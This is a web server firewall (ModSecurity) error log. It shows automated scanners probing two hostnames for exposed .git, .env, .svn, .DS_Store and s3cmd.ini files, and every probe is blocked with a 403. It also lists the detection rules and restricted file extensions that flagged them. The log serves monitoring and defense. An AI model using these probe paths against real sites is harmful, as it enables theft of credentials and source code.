[Fri May 24 12:48:30.551933 2024] [:error] [pid 3435529] [client 91.215.85.43:45184] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMHgAAAAE"]
[Fri May 24 12:48:30.553144 2024] [authz_core:error] [pid 3435533] [client 91.215.85.43:45132] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
[Fri May 24 12:48:30.555264 2024] [:error] [pid 3435532] [client 91.215.85.43:45048] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcgAAAAQ"]
[Fri May 24 12:48:30.555538 2024] [:error] [pid 3435532] [client 91.215.85.43:45048] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcgAAAAQ"]
[Fri May 24 12:48:30.555687 2024] [:error] [pid 3435532] [client 91.215.85.43:45048] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcgAAAAQ"]
[Fri May 24 12:48:30.556262 2024] [:error] [pid 3435531] [client 91.215.85.43:45052] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQLAAAAAM"]
[Fri May 24 12:48:30.556564 2024] [:error] [pid 3435531] [client 91.215.85.43:45052] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQLAAAAAM"]
[Fri May 24 12:48:30.556786 2024] [:error] [pid 3435531] [client 91.215.85.43:45052] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQLAAAAAM"]
[Mon May 27 02:48:55.954449 2024] [:error] [pid 3499768] [client 103.102.228.131:44100] [client 103.102.228.131] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZlPYd065WBXKfXdQQRlLtwAAAAE"]
[Mon May 27 02:48:55.955321 2024] [:error] [pid 3499768] [client 103.102.228.131:44100] [client 103.102.228.131] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZlPYd065WBXKfXdQQRlLtwAAAAE"]
[Mon May 27 02:48:55.955857 2024] [:error] [pid 3499768] [client 103.102.228.131:44100] [client 103.102.228.131] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZlPYd065WBXKfXdQQRlLtwAAAAE"]
[Mon May 27 03:59:50.353016 2024] [:error] [pid 3503319] [client 104.234.204.32:56992] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.svn/entries"] [unique_id "ZlPpFlCy82iAIbN4OsijhwAAAAQ"]
[Mon May 27 03:59:50.353815 2024] [:error] [pid 3503319] [client 104.234.204.32:56992] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.svn/entries"] [unique_id "ZlPpFlCy82iAIbN4OsijhwAAAAQ"]
[Mon May 27 03:59:50.354253 2024] [:error] [pid 3503319] [client 104.234.204.32:56992] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.svn/entries"] [unique_id "ZlPpFlCy82iAIbN4OsijhwAAAAQ"]
[Mon May 27 03:59:50.562428 2024] [:error] [pid 3503317] [client 104.234.204.32:57004] [client 104.234.204.32] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/s3cmd.ini"] [unique_id "ZlPpFreHcrnEyUP-KmdMRAAAAAI"]
[Mon May 27 03:59:50.563419 2024] [:error] [pid 3503317] [client 104.234.204.32:57004] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/s3cmd.ini"] [unique_id "ZlPpFreHcrnEyUP-KmdMRAAAAAI"]
[Mon May 27 03:59:50.563910 2024] [:error] [pid 3503317] [client 104.234.204.32:57004] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/s3cmd.ini"] [unique_id "ZlPpFreHcrnEyUP-KmdMRAAAAAI"]
[Mon May 27 07:50:04.440178 2024] [:error] [pid 3503559] [client 36.70.233.100:62669] [client 36.70.233.100] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "ZlQfDJBfQ0Vw7eddYDVxGAAAAAc"]
[Mon May 27 07:50:04.440512 2024] [:error] [pid 3503559] [client 36.70.233.100:62669] [client 36.70.233.100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "ZlQfDJBfQ0Vw7eddYDVxGAAAAAc"]
[Mon May 27 07:50:04.440710 2024] [:error] [pid 3503559] [client 36.70.233.100:62669] [client 36.70.233.100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "ZlQfDJBfQ0Vw7eddYDVxGAAAAAc"]
[Mon May 27 07:50:06.061997 2024] [:error] [pid 3503317] [client 36.70.233.100:56154] [client 36.70.233.100] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZlQfDreHcrnEyUP-KmdMTQAAAAI"]
[Mon May 27 07:50:06.062495 2024] [:error] [pid 3503317] [client 36.70.233.100:56154] [client 36.70.233.100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZlQfDreHcrnEyUP-KmdMTQAAAAI"]
[Mon May 27 07:50:06.063049 2024] [:error] [pid 3503317] [client 36.70.233.100:56154] [client 36.70.233.100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZlQfDreHcrnEyUP-KmdMTQAAAAI"]
[Tue May 28 03:49:28.965236 2024] [:error] [pid 3525684] [client 103.102.228.131:38438] [client 103.102.228.131] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZlU4KDjG78WAQUMfhzbE4AAAAAQ"]
[Tue May 28 03:49:28.965815 2024] [:error] [pid 3525684] [client 103.102.228.131:38438] [client 103.102.228.131] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZlU4KDjG78WAQUMfhzbE4AAAAAQ"]
[Tue May 28 03:49:28.966240 2024] [:error] [pid 3525684] [client 103.102.228.131:38438] [client 103.102.228.131] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZlU4KDjG78WAQUMfhzbE4AAAAAQ"]
[Tue May 28 15:09:40.223780 2024] [:error] [pid 3530738] [client 45.135.57.32:1385] [client 45.135.57.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZlXXlA4X-ZsZ2S9SX61tXwAAAAc"], referer: http://economiasolidale.test.indacotrentino.com/.git/HEAD
[Tue May 28 15:09:40.224457 2024] [:error] [pid 3530738] [client 45.135.57.32:1385] [client 45.135.57.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZlXXlA4X-ZsZ2S9SX61tXwAAAAc"], referer: http://economiasolidale.test.indacotrentino.com/.git/HEAD
[Tue May 28 15:09:40.224902 2024] [:error] [pid 3530738] [client 45.135.57.32:1385] [client 45.135.57.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZlXXlA4X-ZsZ2S9SX61tXwAAAAc"], referer: http://economiasolidale.test.indacotrentino.com/.git/HEAD
[Wed May 29 05:15:28.538206 2024] [:error] [pid 3548013] [client 91.215.85.43:40292] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /data/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpmwAAAAU"]
[Wed May 29 05:15:28.538730 2024] [:error] [pid 3548009] [client 91.215.85.43:40288] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxQAAAAE"]
[Wed May 29 05:15:28.538997 2024] [:error] [pid 3548013] [client 91.215.85.43:40292] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpmwAAAAU"]
[Wed May 29 05:15:28.539352 2024] [:error] [pid 3548009] [client 91.215.85.43:40288] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxQAAAAE"]
[Wed May 29 05:15:28.539503 2024] [:error] [pid 3548013] [client 91.215.85.43:40292] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpmwAAAAU"]
[Wed May 29 05:15:28.539756 2024] [:error] [pid 3548009] [client 91.215.85.43:40288] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxQAAAAE"]
[Wed May 29 05:15:28.547377 2024] [:error] [pid 3548010] [client 91.215.85.43:40322] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRAAAAAI"]
[Wed May 29 05:15:28.547899 2024] [:error] [pid 3548010] [client 91.215.85.43:40322] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRAAAAAI"]
[Wed May 29 05:15:28.548274 2024] [:error] [pid 3548010] [client 91.215.85.43:40322] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRAAAAAI"]
[Wed May 29 05:15:28.555215 2024] [:error] [pid 3548008] [client 91.215.85.43:40368] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /__macosx/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3UwAAAAA"]
[Wed May 29 05:15:28.555502 2024] [:error] [pid 3548008] [client 91.215.85.43:40368] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3UwAAAAA"]
